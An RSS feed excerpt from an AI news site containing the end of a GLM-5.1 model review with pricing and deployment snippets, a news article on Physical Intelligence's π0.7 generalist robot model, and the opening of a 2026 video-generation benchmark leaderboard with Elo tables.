<p><img src="/images/reviews/review-glm-5-1-circuit.jpg" alt="Abstract close-up of electronic circuit pathways glowing in blue light">
<em>GLM-5.1 is built for long-running agentic loops, not fast interactive completions.</em>
<small>Source: pexels.com</small></p>
<div class="pull-quote">
<p>GLM-5.1 makes more sense as the backbone of an autonomous agent than as an interactive assistant. Give it a ticket and come back later.</p>
</div>
<h2 id="pricing-and-access">Pricing and Access</h2>
<p>The model weights are on Hugging Face at <code>zai-org/GLM-5.1</code> under the MIT license, which means unrestricted commercial use and self-hosting.</p>
<p>For API access, Z.ai prices GLM-5.1 at $0.95 per million input tokens and $3.15 per million output tokens, with cached inputs at $0.26 per million. Those prices sit comfortably below what Anthropic and OpenAI charge for their frontier models.</p>
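<p>At those rates, even a long agentic run stays cheap in absolute terms. A back-of-envelope sketch with assumed token counts (the cache split is illustrative):</p>
<pre><code class="language-python"># Cost estimate for one long agentic run at Z.ai's published GLM-5.1 rates.
# Token counts below are illustrative assumptions.
input_tokens  = 8_000_000    # repeated context reads across many iterations
cached_tokens = 5_000_000    # portion of input served from the context cache
output_tokens = 2_000_000

cost = ((input_tokens - cached_tokens) / 1e6 * 0.95    # fresh input
        + cached_tokens / 1e6 * 0.26                   # cached input
        + output_tokens / 1e6 * 3.15)                  # output
print(f"Estimated run cost: ${cost:.2f}")              # about $10.45
</code></pre>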
<p>Z.ai also offers a subscription-tier Coding Plan aimed at developers who want integrated tooling rather than raw API access:</p>
<table>
  <thead>
      <tr>
          <th>Tier</th>
          <th>Price</th>
          <th>Notes</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Lite</td>
          <td>~$10/month</td>
          <td>Basic access to GLM-5.1 and GLM-5-Turbo</td>
      </tr>
      <tr>
          <td>Pro</td>
          <td>~$30/month</td>
          <td>Full model suite, priority throughput</td>
      </tr>
      <tr>
          <td>Max</td>
          <td>~$80/month</td>
          <td>Near-unlimited usage of premium models</td>
      </tr>
  </tbody>
</table>
<p>Free-tier users get access to GLM-4.7-Flash and GLM-4.5-Flash at no cost, along with a small allocation of premium model credits.</p>
<p>Local deployment works with standard frameworks. On an NVIDIA DGX Spark or equivalent multi-GPU setup, you can run the FP8-quantized variant (<code>zai-org/GLM-5.1-FP8</code>) with reduced memory requirements. The full BF16 weights need substantially more VRAM - this isn't a laptop model.</p>
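<p>For offline inference on a suitably large multi-GPU node, a minimal vLLM sketch looks like the following. The tensor-parallel degree and the trimmed context length are assumptions - size them to your GPU count and memory - and the FP8 checkpoint name comes from the Hugging Face listing above.</p>
<pre><code class="language-python"># Minimal offline-inference sketch with vLLM (v0.19.0+ per Z.ai's docs).
# Assumes a multi-GPU node with enough aggregate VRAM for the FP8 checkpoint.
from vllm import LLM, SamplingParams

llm = LLM(
    model="zai-org/GLM-5.1-FP8",
    tensor_parallel_size=8,       # assumption; match your GPU count
    max_model_len=131_072,        # trimmed below the 200K max to fit KV cache (assumption)
)
params = SamplingParams(temperature=0.2, max_tokens=4096)
outputs = llm.generate(
    ["Write a unit test for the retry logic in client.py."], params)
print(outputs[0].outputs[0].text)
</code></pre>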
<h2 id="strengths">Strengths</h2>
<ul>
<li><strong>SWE-Bench Pro leader</strong>: 58.4 is the highest public score on the benchmark that best predicts real-world software engineering performance</li>
<li><strong>Genuinely long autonomous execution</strong>: eight-hour uninterrupted agentic sessions with maintained goal alignment aren't something most models can do</li>
<li><strong>MIT license with commercial use</strong>: no restrictions, self-hostable, no vendor lock-in</li>
<li><strong>Competitive API pricing</strong>: at $0.95/$3.15 per million tokens, it undercuts frontier closed-source models</li>
<li><strong>Deep engineering toolkit</strong>: function calling, context caching, MCP integration, structured outputs, thinking mode - all there</li>
<li><strong>CyberGym leader</strong>: 68.7 on security task completion ahead of Claude Opus 4.6's 66.6</li>
</ul>
<h2 id="weaknesses">Weaknesses</h2>
<ul>
<li><strong>Text-only</strong>: no image, audio, or video input while GPT-5.4, Claude Opus 4.6, and Gemini 3.1 Pro are all multimodal</li>
<li><strong>Slower generation speed</strong>: 40-44 tokens/second against a competitive median above 53 t/s, which is noticeable in interactive use</li>
<li><strong>Verbose output</strong>: the model produces significantly more tokens than peers to reach equivalent answers, which inflates costs and latency (the sketch after this list illustrates the effect)</li>
<li><strong>Math and science gaps</strong>: AIME 2026 (95.3) and GPQA-Diamond (86.2) trail the frontier, making it a weaker choice for research or quantitative tasks</li>
<li><strong>Self-reported benchmarks</strong>: the SWE-Bench Pro score hasn't been independently verified by a third-party lab</li>
<li><strong>Young ecosystem</strong>: fewer community integrations and third-party tooling than Claude or OpenAI-compatible APIs</li>
</ul>
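<p>On the verbosity point: a cheaper per-token price can be partly eaten by longer outputs. A parametric sketch with purely hypothetical token counts and a hypothetical peer price:</p>
<pre><code class="language-python"># How output verbosity erodes a per-token price advantage.
# All figures below are hypothetical, for illustration only.
def cost_per_task(output_price_per_mtok, output_tokens):
    return output_price_per_mtok * output_tokens / 1e6

glm_cost  = cost_per_task(3.15, 12_000)   # GLM-5.1 list price, verbose answer (assumed length)
peer_cost = cost_per_task(10.00, 6_000)   # hypothetical pricier but terser peer

print(f"GLM-5.1: ${glm_cost:.4f}/task   peer: ${peer_cost:.4f}/task")
# The gap narrows from roughly 3.2x (price per token) to roughly 1.6x (price per task).
</code></pre>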
<h2 id="verdict">Verdict</h2>
<p>GLM-5.1 is the most capable open-weight model available for agentic software engineering work. The SWE-Bench Pro result is real - partially backed up by Arena.ai's independent Code Arena rankings - and the sustained eight-hour autonomous execution is a genuine differentiator for teams building long-running coding agents. The MIT license and competitive API pricing remove the usual friction of adopting a less-established model.</p>
<p>The weaknesses are real too. No multimodal input, slower token generation, and benchmark claims that haven't all been independently verified mean this isn't a drop-in replacement for Claude or GPT-5.4 across general workloads. For coding agents specifically - especially those that need to run overnight on complex engineering tasks - GLM-5.1 earns serious consideration.</p>
<p>The detail that makes the result interesting beyond the benchmark number: it was built entirely on Huawei silicon, by a lab that's been cut off from US chips for over a year. Whether that changes anything about how US policymakers think about export controls is a separate question. The technical fact is that the gap between Western and Chinese frontier models on coding tasks is now measured in decimal points.</p>
<p><strong>Score: 8.1 / 10</strong></p>
<hr>
<h2 id="sources">Sources</h2>
<ul>
<li><a href="https://docs.z.ai/guides/llm/glm-5.1">GLM-5.1 Official Documentation - Z.ai</a></li>
<li><a href="https://huggingface.co/zai-org/GLM-5.1">zai-org/GLM-5.1 on Hugging Face</a></li>
<li><a href="https://www.marktechpost.com/2026/04/08/z-ai-introduces-glm-5-1-an-open-weight-754b-agentic-model-that-achieves-sota-on-swe-bench-pro-and-sustains-8-hour-autonomous-execution/">Z.AI Introduces GLM-5.1 - MarkTechPost</a></li>
<li><a href="https://artificialanalysis.ai/models/glm-5-1">GLM-5.1 - Artificial Analysis</a></li>
<li><a href="https://openrouter.ai/z-ai/glm-5.1">GLM-5.1 API Pricing - OpenRouter</a></li>
<li><a href="https://dataconomy.com/2026/04/08/z-ais-glm-5-1-tops-swe-bench-pro-beating-major-ai-rivals/">GLM-5.1 Tops SWE-Bench Pro - Dataconomy</a></li>
<li><a href="https://www.modemguides.com/blogs/ai-news/glm-5-1-open-source-benchmarks-local-ai">GLM-5.1 Open Source #1 on SWE-Bench Pro - ModemGuides</a></li>
<li><a href="https://www.buildfastwithai.com/blogs/glm-5-1-open-source-review-2026">GLM-5.1 Full Review - BuildFastWithAI</a></li>
<li><a href="https://lushbinary.com/blog/glm-5-1-benchmarks-breakdown-swe-bench-pro-nl2repo-cybergym/">GLM-5.1 Benchmarks Breakdown - Lushbinary</a></li>
<li><a href="https://z.ai/subscribe">Z.ai Coding Plan Pricing</a></li>
</ul>
]]></content:encoded><dc:creator>Elena Marchetti</dc:creator><category>Reviews</category><media:content url="https://awesomeagents.ai/images/reviews/review-glm-5-1_hu_362c5b792452e325.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/reviews/review-glm-5-1_hu_362c5b792452e325.jpg" width="1200" height="675"/></item><item><title>Physical Intelligence Launches π0.7 for Untrained Tasks</title><link>https://awesomeagents.ai/news/physical-intelligence-pi07-generalist-robot/</link><pubDate>Fri, 17 Apr 2026 16:56:58 +0200</pubDate><guid>https://awesomeagents.ai/news/physical-intelligence-pi07-generalist-robot/</guid><description><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/6awa03FFzAfzGQPI9BAI8H?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Physical Intelligence on April 16 unveiled π0.7, a generalist robot model that can tackle tasks it was never directly trained on - then match the performance of specialist models that were. It's a result that the robotics field has been chasing for years and that most researchers thought was still a few model generations away.</p>]]></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<div class="podcast-embed">
<iframe style="border-radius:12px" src="https://open.spotify.com/embed/episode/6awa03FFzAfzGQPI9BAI8H?utm_source=generator&theme=0" width="100%" height="152" frameBorder="0" allowfullscreen="" allow="autoplay; clipboard-write; encrypted-media; fullscreen; picture-in-picture" loading="lazy"></iframe>
</div>
<p>Physical Intelligence on April 16 unveiled π0.7, a generalist robot model that can tackle tasks it was never directly trained on - then match the performance of specialist models that were. It's a result that the robotics field has been chasing for years and that most researchers thought was still a few model generations away.</p>
<div class="news-tldr">
<p><strong>Key Specs - π0.7</strong></p>
<table>
  <thead>
      <tr>
          <th>Spec</th>
          <th>Value</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Model type</td>
          <td>Vision-Language-Action (VLA) generalist</td>
      </tr>
      <tr>
          <td>Core claim</td>
          <td>Compositional generalization across unseen tasks</td>
      </tr>
      <tr>
          <td>Conditioning inputs</td>
          <td>Language, visual subgoals, metadata, control labels</td>
      </tr>
      <tr>
          <td>Training data sources</td>
          <td>Robot episodes, human demos, web VLM pretraining, RL policies</td>
      </tr>
      <tr>
          <td>Demonstrated tasks</td>
          <td>Laundry folding, espresso prep, box assembly, vegetable peeling, appliance operation</td>
      </tr>
      <tr>
          <td>Cross-embodiment</td>
          <td>UR5e industrial arm, bimanual desktop robots</td>
      </tr>
      <tr>
          <td>Specialist parity</td>
          <td>Matches RL-tuned π*0.6 across all tested tasks</td>
      </tr>
  </tbody>
</table>
</div>
<h2 id="what-π07-actually-does">What π0.7 Actually Does</h2>
<h3 id="a-generalist-that-rivals-specialists">A generalist that rivals specialists</h3>
<p>The headline result is that a single π0.7 model, with no task-specific fine-tuning, can match the success rates of Physical Intelligence's own π*0.6 specialist models - which were trained via a dedicated reinforcement learning algorithm called Recap specifically designed to maximize performance on individual tasks.</p>
<p>That matters because the standard path in robot learning has always been: train a new model (or fine-tune heavily) for every new task. Swapping out a laundry-folding robot for an espresso-making one isn't just a software update - it's a whole new training pipeline. π0.7 is an attempt to change that.</p>
<p>Co-founder Sergey Levine described the shift this way: &quot;Once it crosses that threshold where it goes from only doing exactly the trained tasks to actually remixing things in new ways, the capabilities are going up more than linearly.&quot; That's the same description researchers used for early large language models - where each new benchmark wasn't just incrementally improved on, it was saturated outright.</p>
<h3 id="the-air-fryer-experiment">The air fryer experiment</h3>
<p>The clearest demonstration of what the company means by &quot;compositional generalization&quot; is the air fryer test. π0.7 had exactly two relevant training episodes involving that appliance: one showing a robot pushing an air fryer closed, and one showing a robot placing a bottle inside. Neither episode involved cooking.</p>
<p>Given the instruction &quot;cook a sweet potato,&quot; with no additional coaching, the model attempted the task and failed. Given step-by-step verbal instructions (&quot;open the fryer, place the potato, set the timer&quot;), it succeeded - synthesizing fragments from tangential training data into functional behavior. The research team later found that the model probably learned air fryer context from the open-source DROID dataset, which includes footage of humans interacting with appliances. The robot never saw the specific task but absorbed enough about the appliance class to generalize.</p>
<p><img src="/images/news/physical-intelligence-pi07-generalist-robot-kitchen-demo.jpg" alt="π0.7 navigating a kitchen environment during the air fryer demonstration">
<em>A fisheye view from inside the robot's perception stack as it navigates the kitchen for the air fryer cooking experiment.</em>
<small>Source: pi.website</small></p>
<h2 id="architecture-three-layers-working-together">Architecture: Three Layers Working Together</h2>
<h3 id="the-policy-stack">The policy stack</h3>
<p>π0.7 is a Vision-Language-Action model built from three components that operate at different levels of abstraction:</p>
<ul>
<li><strong>High-level policy</strong>: creates language subgoals describing what the robot should achieve next</li>
<li><strong>World model</strong>: produces visual subgoals at inference time - literally predicting what the scene should look like after the next action</li>
<li><strong>Action expert</strong>: takes the multimodal context (camera frames, language instructions, predicted subgoals) and outputs low-level robot control commands</li>
</ul>
<p>The world model step is what makes compositional generalization plausible. Instead of mapping raw instructions directly to motor commands, the model first imagines what success looks like, then plans toward that image. This creates a natural bottleneck where learned skills from different domains can be mixed and matched through the visual prediction space.</p>
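<p>To make that loop concrete, here is a minimal Python sketch of how the three layers might hand off to each other at each control step. The function names, signatures, and stand-in return values are assumptions for illustration only - Physical Intelligence hasn't published an API.</p>
<pre><code class="language-python"># Illustrative only: stand-in implementations of the three-layer loop described above.
# None of these names come from Physical Intelligence's codebase.

def high_level_policy(observation: dict, instruction: str) -> str:
    # 1. Decide what to achieve next, expressed in language.
    return f"grasp the {instruction.split()[-1]}"

def world_model(observation: dict, subgoal_text: str) -> list:
    # 2. Predict what the scene should look like once the subgoal is reached
    #    (a real system would return a predicted image, not a placeholder vector).
    return [0.0] * 16

def action_expert(observation: dict, subgoal_text: str, subgoal_image: list) -> list:
    # 3. Map the multimodal context to a low-level control command.
    return [0.05, -0.10, 0.00]

def control_step(observation: dict, instruction: str) -> list:
    subgoal_text = high_level_policy(observation, instruction)
    subgoal_image = world_model(observation, subgoal_text)
    return action_expert(observation, subgoal_text, subgoal_image)

print(control_step({"camera": "frame_t0"}, "pick up the potato"))
</code></pre>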
<h3 id="training-with-varied-conditioning">Training with varied conditioning</h3>
<p>The training methodology is built around what the team calls &quot;diverse multimodal conditioning&quot; - as opposed to naive data merging. Rather than throwing all robot episodes into a single training run with a fixed instruction format, π0.7 was trained with varied prompt structures:</p>
<ul>
<li>Language instructions describing tasks and subtasks at different granularities</li>
<li>Metadata flags specifying execution speed or quality level</li>
<li>Control modality labels showing whether the robot should use joint control or end-effector control</li>
<li>Visual subgoal images showing desired intermediate states</li>
</ul>
<p>The underlying data combined several sources: teleoperated robot episodes, human demonstrations captured with a different setup, web-scale vision-language pretraining (the same recipe that powers today's VLMs), and synthetic data created by running existing RL policies autonomously. The diversity of conditioning formats is what allows the model to be steered at inference time through plain language rather than requiring task-specific prompts.</p>
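<p>As a rough illustration of what &quot;diverse multimodal conditioning&quot; implies at the data level, a single training sample might bundle several of those conditioning fields together. The field names below are assumptions, not Physical Intelligence's schema.</p>
<pre><code class="language-python"># Hypothetical shape of one conditioned training sample; field names are illustrative.
sample = {
    "frames": ["cam_base_t0.png", "cam_wrist_t0.png"],       # camera observations
    "instruction": "fold the t-shirt and stack it neatly",   # coarse language goal
    "subtask": "grasp the left sleeve",                       # fine-grained language subgoal
    "metadata": {"speed": "fast", "quality": "high"},         # execution flags
    "control_mode": "end_effector",                           # vs. "joint" control labels
    "visual_subgoal": "predicted_frame_t1.png",               # desired intermediate state
    "actions": [[0.02, -0.01, 0.00, 0.10]],                   # supervised control targets
}
print(sorted(sample.keys()))
</code></pre>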
<h2 id="benchmark-comparison">Benchmark Comparison</h2>
<p>Physical Intelligence compared π0.7 against its own RL-tuned specialist models across the core task set. External benchmarks for generalist robot policies don't yet exist in any standardized form, so these numbers are self-reported.</p>
<table>
  <thead>
      <tr>
          <th>Task</th>
          <th>π0.7 (generalist)</th>
          <th>π*0.6 specialist (RL-tuned)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>Laundry folding (t-shirts, shorts)</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Espresso preparation</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Box assembly</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Vegetable peeling</td>
          <td>Matches</td>
          <td>Baseline</td>
      </tr>
      <tr>
          <td>Air fryer (unseen, coached)</td>
          <td>Succeeds</td>
          <td>N/A</td>
      </tr>
      <tr>
          <td>Cross-embodiment (UR5e)</td>
          <td>Matches human teleop</td>
          <td>Not evaluated</td>
      </tr>
  </tbody>
</table>
<p>The cross-embodiment result deserves closer reading: for the UR5e laundry-folding transfer, the comparison group was human teleoperators attempting the task on the target robot for the first time - subjects with about 375 hours of teleoperation experience. π0.7 matched their first-attempt success rates. That's a useful baseline exactly because it anchors the claim in observable human performance rather than a competing model number.</p>
<p><img src="/images/news/physical-intelligence-pi07-generalist-robot-laundry-demo.jpg" alt="π0.7 in a different physical setup during multi-task evaluation">
<em>The robot's on-board perception during a separate task evaluation in a non-kitchen environment.</em>
<small>Source: pi.website</small></p>
<h2 id="cross-embodiment-transfer">Cross-Embodiment Transfer</h2>
<p>One of the more surprising results is the cross-embodiment transfer: moving the laundry-folding capability from a small static bimanual desktop robot to a large UR5e industrial arm with markedly different morphology - different joint counts, different workspace geometry, different gripper design.</p>
<p>The model didn't require retraining for this. The cross-embodiment generalization comes from the control modality labels in the training data, which teach the model to reason about robot morphology as a conditioning variable rather than a fixed property. If the model has seen enough variations of arm kinematics during training, a new embodiment becomes one more conditioning input rather than a reason to start over.</p>
<p>Physical Intelligence has been documenting this arc for a while. Their <a href="/news/physical-ai-investment-surge-2026/">earlier investment round at an $11B valuation</a> in March was partly premised on exactly this kind of result - that the jump from task-specific to general-purpose robot policies was closer than the market believed. π0.7 is the first internal proof point they've released publicly.</p>
<p>The timing also puts Physical Intelligence directly in competition with Google DeepMind, whose <a href="/news/gemini-robotics-er-1-6-boston-dynamics/">Gemini Robotics-ER 1.6</a> launched in April for Boston Dynamics' Spot platform with a focus on embodied visual reasoning. Those are different bets - Google is pushing integration with commercial robot hardware, while Physical Intelligence is still building the foundation model layer. And Hugging Face's open-source <a href="/news/lerobot-v050-humanoid-open-source/">LeRobot v0.5.0</a> remains the accessible alternative for researchers who want to experiment without proprietary APIs.</p>
<h2 id="what-to-watch">What To Watch</h2>
<h3 id="what-the-demos-dont-prove">What the demos don't prove</h3>
<p>The key limitation is one Physical Intelligence states clearly: π0.7 can't execute multi-step tasks autonomously from a single high-level instruction. &quot;Make toast&quot; doesn't work. &quot;Open the toaster, place the bread, press the lever&quot; does. The coaching step is essential. The model has generalized skill components, not autonomous task planning.</p>
<p>That's a real gap. The practical value of a generalist robot in most commercial settings depends on reducing the amount of per-task human setup. If every new task still requires someone to decompose it into coached substeps, a lot of the generalization value moves from the robot to the operator.</p>
<h3 id="benchmark-opacity">Benchmark opacity</h3>
<p>The comparison data is self-reported, compared against Physical Intelligence's own prior models, with no external replication. The research community still lacks standardized robotics benchmarks that would let third parties verify claims like &quot;matches specialist performance.&quot; Until those exist, every result from any robotics lab - Physical Intelligence, Google DeepMind, NVIDIA - should carry a methodological asterisk. We've seen similar dynamics with <a href="/news/nvidia-alpamayo-100k-downloads-top-robotics-model/">NVIDIA's Alpamayo model</a>, where strong internal numbers didn't fully translate to external testing conditions.</p>
<h3 id="whats-actually-novel">What's actually novel</h3>
<p>Skepticism aside, the compositional generalization result is genuinely new if it holds up. Previous generalist robot models required fine-tuning to match specialist performance. π0.7's claim is that the gap is now zero with no fine-tuning at all. That's a meaningful threshold to cross.</p>
<p>The real test will come when external researchers get access to the model weights - Physical Intelligence hasn't shared a release timeline - and when the evaluation methodology gets stress-tested against tasks that sit further from the training distribution. The air fryer worked because DROID had relevant tangential data. The next test is something truly outside the training set.</p>
<hr>
<p>Physical Intelligence's next public benchmark is whether the model generalizes to tasks where no tangential data exists at all - a question the company hasn't answered yet, and one the broader field will be watching closely.</p>
<p><strong>Sources:</strong></p>
<ul>
<li><a href="https://www.pi.website/blog/pi07">Physical Intelligence π0.7 announcement</a></li>
<li><a href="https://techcrunch.com/2026/04/16/physical-intelligence-a-hot-robotics-startup-says-its-new-robot-brain-can-figure-out-tasks-it-was-never-taught/">Physical Intelligence, a hot robotics startup, says its new robot brain can figure out tasks it was never taught - TechCrunch</a></li>
</ul>
]]></content:encoded><dc:creator>Sophie Zhang</dc:creator><category>News</category><media:content url="https://awesomeagents.ai/images/news/physical-intelligence-pi07-generalist-robot_hu_afea1e0df0f740d4.jpg" medium="image" width="1200" height="675"/><media:thumbnail url="https://awesomeagents.ai/images/news/physical-intelligence-pi07-generalist-robot_hu_afea1e0df0f740d4.jpg" width="1200" height="675"/></item><item><title>Video Generation Benchmarks Leaderboard 2026</title><link>https://awesomeagents.ai/leaderboards/video-generation-benchmarks-leaderboard/</link><pubDate>Fri, 17 Apr 2026 14:08:41 +0200</pubDate><guid>https://awesomeagents.ai/leaderboards/video-generation-benchmarks-leaderboard/</guid><description>&lt;p>The video generation space has had a chaotic few months. OpenAI discontinued Sora on March 24, 2026, less than six months after its public launch, after download numbers had dropped roughly 66% from peak and the product was reportedly burning through $15 million per day in inference costs. ByteDance paused the global rollout of Seedance 2.0 in mid-March following cease-and-desist letters from Disney, Paramount, Warner Bros., and the Motion Picture Association. And a model called HappyHorse-1.0 appeared on Artificial Analysis in early April, topped every ranking within days, then disappeared from public access - before Alibaba confirmed it was their work.&lt;/p></description><content:encoded xmlns:content="http://purl.org/rss/1.0/modules/content/"><![CDATA[<p>The video generation space has had a chaotic few months. OpenAI discontinued Sora on March 24, 2026, less than six months after its public launch, after download numbers had dropped roughly 66% from peak and the product was reportedly burning through $15 million per day in inference costs. ByteDance paused the global rollout of Seedance 2.0 in mid-March following cease-and-desist letters from Disney, Paramount, Warner Bros., and the Motion Picture Association. And a model called HappyHorse-1.0 appeared on Artificial Analysis in early April, topped every ranking within days, then disappeared from public access - before Alibaba confirmed it was their work.</p>
<p>This leaderboard covers where the major models actually stand, based on two types of evidence: the Artificial Analysis Video Arena (blind Elo from user preference votes) and the VBench/VBench-2.0 academic benchmarks (automated metrics across 16-18 dimensions). The two systems measure different things and sometimes disagree. Both matter.</p>
<div class="news-tldr">
<p><strong>TL;DR</strong></p>
<ul>
<li>HappyHorse-1.0 (Alibaba) leads both T2V and I2V Elo rankings by a wide margin - Elo 1,361 for text-to-video, 1,398 for image-to-video - but its public access status is unclear as of publication</li>
<li>Sora is dead. OpenAI shut down the product March 24; the API stays live until September 24, 2026</li>
<li>Seedance 2.0 sits at Elo 1,268 (T2V) despite its suspended global launch - accessible in China, patchy elsewhere</li>
<li>Best reliably available proprietary pick: Kling 3.0 at Elo 1,247 (T2V) with native 4K and multi-shot consistency</li>
<li>Open-source leader: Wan 2.2, which posted an 84.7% overall VBench score</li>
</ul>
</div>
<h2 id="how-these-benchmarks-work">How These Benchmarks Work</h2>
<h3 id="artificial-analysis-video-arena">Artificial Analysis Video Arena</h3>
<p>Artificial Analysis runs blind pairwise comparisons. A user sees two videos generated from the same prompt, doesn't know which model produced which, and picks a winner. Elo scores update continuously from these votes, the same mechanism used in chess ratings. A gap of 20-30 Elo points translates to roughly 53% win rate in direct head-to-head comparisons.</p>
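<p>For intuition on what those Elo gaps mean, the standard Elo expected-score formula converts a rating difference into a head-to-head win probability. The sketch below uses the textbook formula; the arena's exact update mechanics may differ in detail.</p>
<pre><code class="language-python"># Standard Elo expected score: probability the higher-rated model wins a blind pairing.
def elo_win_probability(rating_gap: float) -> float:
    return 1.0 / (1.0 + 10 ** (-rating_gap / 400))

for gap in (20, 30, 51):
    print(f"{gap:>3}-point gap -> {elo_win_probability(gap):.1%} expected win rate")
# 20 -> 52.9%, 30 -> 54.3%, 51 -> 57.3% (the current I2V gap between first and second place)
</code></pre>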
<p>The leaderboard separates text-to-video and image-to-video tasks, and also splits by whether audio output is included. This matters: models that produce synchronized audio (native sound, not post-dubbed) tend to score higher on the audio leaderboard regardless of visual quality alone.</p>
<p>As of April 2026, the leaderboard covers more than 80 models across 24 API providers.</p>
<h3 id="vbench-and-vbench-20">VBench and VBench-2.0</h3>
<p>VBench, introduced at CVPR 2024 by the Vchitect group, decomposes video generation quality into 16 automated dimensions covering two categories - video quality (subject consistency, background consistency, motion smoothness, temporal flickering, dynamic degree, aesthetic quality, imaging quality) and video-text alignment (object class, multiple objects, human action, color, spatial relationship, scene, temporal style, appearance style, overall consistency). Each dimension uses a purpose-built automated evaluator rather than a single aggregate score.</p>
<p>VBench-2.0, released in March 2026, extends the framework to test &quot;intrinsic faithfulness&quot; - five new categories (Human Fidelity, Controllability, Creativity, Physics, Commonsense) with 18 fine-grained sub-dimensions. The original VBench caught many technical defects well; VBench-2.0 is designed for models that have already cleared those. Even leading models currently score around 50% on action faithfulness in the new framework, suggesting plenty of headroom remains.</p>
<p>The two benchmarks answer different questions. VBench rewards smooth, coherent video that matches prompts. VBench-2.0 rewards plausible physics, human motion, and real-world causality. A model can score well on one while failing the other.</p>
<p><img src="/images/leaderboards/video-generation-benchmarks-leaderboard-vbench-radar.jpg" alt="VBench closed-source model radar chart showing evaluation across 16 dimensions">
<em>VBench radar chart comparing closed-source video generation models across all 16 evaluation dimensions. Subject consistency and motion smoothness tend to separate top models from the middle tier.</em>
<small>Source: github.com/Vchitect/VBench</small></p>
<hr>
<h2 id="text-to-video-rankings---artificial-analysis-elo">Text-to-Video Rankings - Artificial Analysis Elo</h2>
<p>Rankings as of April 17, 2026. &quot;No Audio&quot; tracks pure visual quality; &quot;With Audio&quot; includes native synchronized audio output as a preference signal.</p>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Elo (No Audio)</th>
          <th>Elo (With Audio)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>HappyHorse-1.0</td>
          <td>Alibaba-ATH</td>
          <td>1,361</td>
          <td>1,225</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Dreamina Seedance 2.0 720p</td>
          <td>ByteDance Seed</td>
          <td>1,268</td>
          <td>1,221</td>
      </tr>
      <tr>
          <td>3</td>
          <td>Kling 3.0 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,247</td>
          <td>1,100</td>
      </tr>
      <tr>
          <td>4</td>
          <td>SkyReels V4</td>
          <td>Skywork AI</td>
          <td>1,234</td>
          <td>1,135</td>
      </tr>
      <tr>
          <td>5</td>
          <td>grok-imagine-video</td>
          <td>xAI</td>
          <td>1,232</td>
          <td>-</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Kling 3.0 Omni 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,230</td>
          <td>1,101</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Kling 3.0 Omni 720p (Std)</td>
          <td>KlingAI</td>
          <td>1,223</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Vidu Q3 Pro</td>
          <td>Vidu</td>
          <td>1,221</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Veo 3</td>
          <td>Google</td>
          <td>1,217</td>
          <td>-</td>
      </tr>
      <tr>
          <td>10</td>
          <td>PixVerse V5.6</td>
          <td>PixVerse</td>
          <td>1,217</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>Source: <a href="https://artificialanalysis.ai/video/leaderboard/text-to-video">Artificial Analysis Text-to-Video Leaderboard</a></p>
<p><strong>Notes on the table above:</strong> HappyHorse-1.0 leads but its public availability is uncertain - Alibaba confirmed authorship on April 10 but hasn't announced a standard API or subscription product. Seedance 2.0 is accessible primarily in China following its global rollout pause. Runway Gen-4.5 was previously reported with an Elo near 1,247, but doesn't currently appear in the No Audio top-10. The leaderboard updates continuously.</p>
<hr>
<h2 id="image-to-video-rankings---artificial-analysis-elo">Image-to-Video Rankings - Artificial Analysis Elo</h2>
<table>
  <thead>
      <tr>
          <th>Rank</th>
          <th>Model</th>
          <th>Provider</th>
          <th>Elo (No Audio)</th>
          <th>Elo (With Audio)</th>
      </tr>
  </thead>
  <tbody>
      <tr>
          <td>1</td>
          <td>HappyHorse-1.0</td>
          <td>Alibaba-ATH</td>
          <td>1,398</td>
          <td>1,165</td>
      </tr>
      <tr>
          <td>2</td>
          <td>Dreamina Seedance 2.0 720p</td>
          <td>ByteDance Seed</td>
          <td>1,347</td>
          <td>1,176</td>
      </tr>
      <tr>
          <td>3</td>
          <td>grok-imagine-video</td>
          <td>xAI</td>
          <td>1,326</td>
          <td>1,087</td>
      </tr>
      <tr>
          <td>4</td>
          <td>PixVerse V6</td>
          <td>PixVerse</td>
          <td>1,314</td>
          <td>-</td>
      </tr>
      <tr>
          <td>5</td>
          <td>SkyReels V4</td>
          <td>Skywork AI</td>
          <td>1,286</td>
          <td>1,087</td>
      </tr>
      <tr>
          <td>6</td>
          <td>Kling 2.5 Turbo 1080p</td>
          <td>KlingAI</td>
          <td>1,286</td>
          <td>-</td>
      </tr>
      <tr>
          <td>7</td>
          <td>Vidu Q3 Pro</td>
          <td>Vidu</td>
          <td>1,285</td>
          <td>-</td>
      </tr>
      <tr>
          <td>8</td>
          <td>Kling 3.0 Omni 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,284</td>
          <td>-</td>
      </tr>
      <tr>
          <td>9</td>
          <td>Kling 3.0 1080p (Pro)</td>
          <td>KlingAI</td>
          <td>1,282</td>
          <td>-</td>
      </tr>
      <tr>
          <td>10</td>
          <td>PixVerse V5.6</td>
          <td>PixVerse</td>
          <td>1,280</td>
          <td>-</td>
      </tr>
  </tbody>
</table>
<p>Source: <a href="https://artificialanalysis.ai/video/leaderboard/image-to-video">Artificial Analysis Image-to-Video Leaderboard</a></p>
<p>The image-to-video gap between first and second place is 51 Elo points, which is one of the largest margins in the arena's history. For I2V with audio, Seedance 2.0 leads (1,176) over HappyHorse (1,165) and SkyReels V4 (1,087) - the audio pairing is where Seedance retains an advantage.</p>
